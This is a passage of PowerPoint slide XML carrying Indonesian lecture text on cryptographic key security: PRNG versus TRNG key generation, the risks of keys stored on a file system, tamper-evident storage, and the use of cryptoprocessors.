            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pseudo RNG (PRNG) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deterministik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mampu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperoleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembangkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>angka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>acak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sejati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (TRNG). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>entropi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebisingan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pergerakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>udara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nondeterministik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> seaman file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disusupi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencurian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sepenuhnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diaudit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Idealnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> tamper evident. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disusupi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicabut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ciphertext </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kekurangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cryptoprocessor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Karena </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didedikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptoprosesor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cryptoprocessor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penandatanganan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>materi</a:t>
            </a:r>
            <a:r>
